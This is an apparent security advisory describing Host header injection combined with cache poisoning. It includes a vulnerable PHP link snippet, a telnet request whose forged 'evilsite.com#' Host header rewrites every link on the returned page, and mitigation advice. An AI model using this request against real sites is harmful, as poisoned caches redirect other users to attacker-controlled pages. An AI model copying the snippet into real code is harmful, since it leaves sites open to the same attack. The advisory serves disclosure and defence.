I've decided to post this here since it is pretty serious and there is no one vendor to blame. Watch yourselves.
Vulnerability: Rewriting of links and URLs in cached pages to arbitrary strings by unauthenticated HTTP clients.
Affected software: ANY site that does not validate HTTP Host: headers.
It is common practice for web programmers and web frameworks to rely on the value of the HTTP Host header to write links. This is for convenience, so that the same software will run on localhost, various testing servers, subdomains, secondary domains, etc, without modification. For example:
<a href="<?=$_SERVER['HTTP_HOST']?>/login">Login</a>
Looks familiar? This turns out to be a very, very bad idea in any language. The HTTP Host header is arbitrary text controlled by the client, but common practice treats it as though it were a safe environment variable.
The second half of the vulnerability comes when there is HTTP caching going on somewhere on the path between the site and users. This could be a caching proxy run by the site itself, or downstream in ISP proxies, content delivery networks (CDNs), syndicators, etc. This allows an attacker to potentially rewrite URLs on any page he wishes, and embed that exploited page in caches that may be beyond the control of the victim site.
Let me demonstrate with a carefully scrubbed example. I don't wish to point anyone out, but I have successfully tested this exploit against several high-traffic websites, including a well-respected news organization. Several popular web frameworks are vulnerable by default.
The odds are relatively high that your website is vulnerable. Even if you don't do page caching, most ISPs do.
$ telnet www.example.com 80
Trying 1.2.3.4...
Connected to www.example.com.
Escape character is '^]'.
GET /foo/bar.html HTTP/1.1
User-Agent: Mozilla
Host: evilsite.com#
HTTP/1.1 200 OK
Date: Wed, 10 Jun 2008 00:27:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Wed, 17 Jun 2008 00:27:45 GMT
Content-Length: 2959
Content-Type: text/html; charset=iso-8859-1
<html>
<head>
<title>Foo : Bar</title>
</head>
<body>
<a href="http://evilsite.com#/">Home</a>
<a href="http://evilsite.com#/about">About</a>
<a href="http://evilsite.com#/login">Login</a>
[...snip...]
<hr>
<address>Apache Server at evilsite.com# Port 80</address>
</body></html>
Now, if there is any caching going on either by the site owners or any proxies along the way, other clients will get the exploited page.
I don't know what else to say. I have no hard data to prove this exploit has been used before. Given its simplicity I would not be surprised to learn that it is as old as the protocol itself.
Mitigation: do NOT use the value of the Host header for anything. If you must, apply very strict filters to only allow valid FQDNs, and then whitelist the FQDNs you allow. Treat it as you would any arbitrary data coming from the outside. If your webserver is configured to output the value of the Host header (as in the example, and as by default in many webservers), disable that configuration.
I've found only one reference that outlines the full consequences of this vuln, but it concentrates on the Zope framework.
https://bugs.launchpad.net/zope2/+bug/142848Special thanks to Wayne Kao and Jon Frank.